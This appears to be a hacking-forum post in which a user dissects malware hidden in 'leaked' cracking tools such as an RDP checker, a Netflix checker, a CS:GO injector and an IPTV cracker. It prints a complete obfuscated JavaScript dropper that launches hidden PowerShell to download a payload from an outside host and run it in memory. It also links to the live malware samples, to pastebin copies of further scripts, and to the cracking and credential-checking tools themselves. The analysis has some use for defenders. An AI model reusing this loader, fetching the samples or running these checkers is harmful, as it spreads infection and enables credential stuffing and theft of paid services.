Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
New Ownership - Policies and Changes Going Forward
Thread Rating:
  • 0 Vote(s) - 0 Average


Malbusted | vicen1985 filter_list
Author
Message
miso Away
Fat and Dumb
Five Years of Service
Posts: 1,683
Threads: 495
Currency: 193 NSP
GoldFireworksBirthdayJack-O-Lantern
Malbusted | vicen1985 09-02-2020, 05:01 AM #1
[Image: malbusted.png]
Code:
########################################################################################################

Malware Structure:
The malware has been injected into an silent installer containing the actual application, & the installer have
been made to extract the malicious script in %appdata% load them. I however havent been able to load into
the actual application, so i am not sure if the installer starts the application or not when finished.

Weak point of it:
The malware author used Nullsoft Scriptable Install System to create their malicious installer, however,
it is really easy to extract, using 7zip & opening the malicious installer with "Open As *" reveals its content

(PS: The Fortnite thread had an installer which i haven't been able to unpack its content of without directly
running it in a Sandbox, none of my tools were able to extract its content directly, which sucks.)

Please note that the following files present in installer have their content available on a raw pastebin page, which is given here:

l.vbs: https://pastebin.com/raw/ekHNrJ93
r.vbs: https://pastebin.com/raw/B43XUmxb
w.vbs: https://pastebin.com/raw/WZyKQTDD

n.js:
var shell = WScript.CreateObject("WScript.Shell");
var ASWEAD = "wer"
shell.Run("po"+ASWEAD+"shell -windowstyle hidden -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.asmreekasounds.com/upfiles/up_down/6c5b3796f4091426f3b34bace39c89c7.mp3'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)");

### Downloads ###
RDP Checker: https://mega.nz/file/M3ZggQRa#JJzoF0Hu63m2t4ZQIebSnBRoDz1FpcryxiuXWBF6jp8
Netflix Checker: https://mega.nz/file/UvJUHIiI#aOOse6YKkKf8jLYfP2fHFZcPGPOLX8be6bKKhERXsIk
LJXD 1.7: https://mega.nz/file/w3RQ2YRZ#bEu1xxq1zrLBX8r1NCHunh1pJ31U8BMOyBeHsGMqdGE
IPTV Cracking Tool: https://mega.nz/file/d7QA1aCb#I5meoYSSoO0DLNU3wzKGL1wFzki9j6qqqnxVshHUpgc

### Download Malware Samples ###
(the links are from the original threads)
RDP Checker: https://anonfile.com/TaPeY07fna/MultiRDP_Checker_1.0.0.0_alpha_rar | https://www.sendspace.com/file/o263v5
Netflix Checker: https://anonfile.com/08lcZb7dnb/Checker_Netflix_By_Burnwood_Edition_Free_rar | https://www.sendspace.com/file/y9p8b8
LJXD 1.7: https://anonfile.com/j6Z1Za7bn6/INTERHOOK_CS_GO_LJXD_Injector_rar | https://www.sendspace.com/file/ki71hz
IPTV Cracking Tool: https://anonfile.com/g2r1Z27dnf/IPTV_Multi_Tool_By_Mohamed.Khater_v7_rar | https://www.sendspace.com/file/kv2mn9
Fortnite Macro: https://anonfile.com/k5ZfZ77bnb/Fortnite_Macro_Building_Script_AutoHotkey_1.1.31.00_rar | https://www.sendspace.com/file/5y6op5

########################################################################################################

Thread Link: https://sinister.ly/Thread-Leak-NEW-FAST-MultiRDP-Checker-1-0-0-0-alpha-2019

Unpacked Files:
- RdpChecker.V1.0.exe | Virustotal Scan [45/69]: https://www.virustotal.com/gui/file/3c3357697e6d46025d1be95b74a08f041a3422a5ad6fa1eadc70dad9349fb3cd/detection
  |- l.vbs
  |- RdpChecker.V1.0.exe | Virustotal Scan [4/73]: https://www.virustotal.com/gui/file/2842bdb2938e021fdce35c566f63c218451b3e7403787f8b80024c72425da668/detection
  |- n.js
  |- r.vbs
  |- w.vbs
 
### - RdpChecker.V1.0.exe (unpacked) - ###
### MD:
CodeLang: VB.NET / C#
Obfuscated: Yes (.NET Reactor 4.8)

########################################################################################################

Thread Link: https://sinister.ly/Thread-Leak-CHECKER-NETFLIX-By-Burnwood-VERY-FAST-2019

Unpacked Files:
- NETFL_X CHECKER V3.1.exe | Virustotal Scan [47/69]: https://www.virustotal.com/gui/file/6e894ccef531f9cbb056d235525d6220a643983c39436312c1ae8e3b32fdaa57/detection
  |- l.vbs
  |- NETFL_X CHECKER V3.0.exe | Virustotal Scan [37/67]: https://www.virustotal.com/gui/file/e741fdfcddd4a75c2e4769c10e631d3b78bc691a0cf92c4d15eda901fadda274/detection
  |- n.js
  |- r.vbs
  |- w.vbs
 
### - NETFL_X CHECKER V3.0.exe (unpacked) - ###
### MD:
CodeLang: VB.NET / C#
Obfuscated: Yes (Beds Protector) | The application crashes on start

########################################################################################################

Thread Link: https://sinister.ly/Thread-Leak-NEW-INTERHOOK-CS-GO-LJXD-Injector-v1-7

Unpacked Files:
- LJXD 1.7.exe | Virustotal Scan [33/68]: https://www.virustotal.com/gui/file/476ac845bca03aa7686f7c32ec5a0e3c481abc6704d70bc91f3b6137175eb6e2/detection
  |- l.vbs
  |- LJXD 1.7.exe | Virustotal Scan [33/71]: https://www.virustotal.com/gui/file/6392c1a17b8e55be0fd0bb6793f996adb9d89a5ccb14f2be5739b394061499e8/detection
  |- n.js
  |- r.vbs
- INTERHOOK.dll | Virustotal Scan [40/70]: https://www.virustotal.com/gui/file/177796eb4782aa2e1ca3eb2eb66b7399686532e73eb47fba0b76e01199cc2aec/detection

### - LJXD 1.7.exe - ###
### MD:
CodeLang: Obj-C / C++ / C

########################################################################################################

Thread Link: https://sinister.ly/Thread-Leak-NEW-Fortnite-Macro-Building-Script-AND-RAMP-RUSH

Unpacked Files:
- AutoHotkey_1.1.31.00_setup.exe
  |- l.vbs
  |- n.js
  |- r.vbs
  |- w.vbs
- Fortnite-macro_RecON Y RAMP.ahk | Doesn't seem to be malicious, can be viewed in a text editor

(i do not know what else does the installer contain, the only content that i have been able to access were the listed files,
the installer might contain more, but i haven't been able to reach anything else)

########################################################################################################

Thread Link: https://sinister.ly/Thread-Leak-NEW-IPTV-Multi-Tool-By-Mohamed-Khater-v-7

Unpacked Files:
- IPTV_Cracking_Tool_v7.exe | Virustotal Scan [44/72]: https://www.virustotal.com/gui/file/cf5f9e2147dce5ee5b5a3a0ffb9c8980cc9c2a51465a36ae79eb3ffb77e9bba1/relations
  |- IPTV_Cracking_Tool.exe | Virustotal Scan [7/68]: https://www.virustotal.com/gui/file/a931f52261ecdaa4b09bdc9a6287fa0cec8167e2e237b9cd9964f5e1099a27aa/detection
  |- l.vbs
  |- n.js
  |- r.vbs
  |- w.vbs

### - IPTV_Cracking_Tool.exe - ###
### MD:
CodeLang: VB.NET / C#
Obfuscated?: Yes (coudn't deobfuscate, .NET Reactor 4.8)

########################################################################################################

[+] 1 user Likes miso's post
Reply







Users browsing this thread: 1 Guest(s)